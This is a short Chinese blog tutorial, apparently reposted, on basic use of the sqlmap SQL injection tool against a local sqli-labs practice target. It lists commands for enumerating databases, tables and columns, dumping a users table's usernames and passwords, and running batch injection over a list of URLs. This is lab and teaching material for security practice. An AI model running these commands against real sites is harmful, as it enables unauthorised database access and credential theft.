sqlmap的简单使用

Posted 灿灿的金

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap的简单使用相关的知识,希望对你有一定的参考价值。

在sqlmap.py 目录下使用

python sqlmap.py --purage //清除之前的缓存


拿到所有的库名

python sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 --level=5 --risk=3 --dbs

sqlmap.py -u 后面的地址如果没有空格可以不加引号
level越高发送的payload越多,risk越高尝试的方式越多,太高可能导致ip被封

查看当前数据库的名字

python sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 --current-db

查看表名

python sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 -D "security" --tables,

有-D 表示使用了哪个库,不加则会显示出所有的表名

查看列名

python sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 -D "security" -T "users" --col

拿数据,

python  sqlmap.py -u http://localhost/sqli-labs/less-1/?id=1 -D "security" -T "users" -C "password,username" --dump

批量注入

python sqlmap.py -m d:/18urls.txt --batch

使用–batch可以默认回答

以上是关于sqlmap的简单使用的主要内容,如果未能解决你的问题,请参考以下文章

sqlmap的简单使用

sqlmap简单流程使用

sqlmap使用

使用sqlmap进行注入时level值至少为多少时sqlmap才会去测试cookie

sqlmap

实战!使用burp macros和sqlmap绕过csrf防护进行sql注入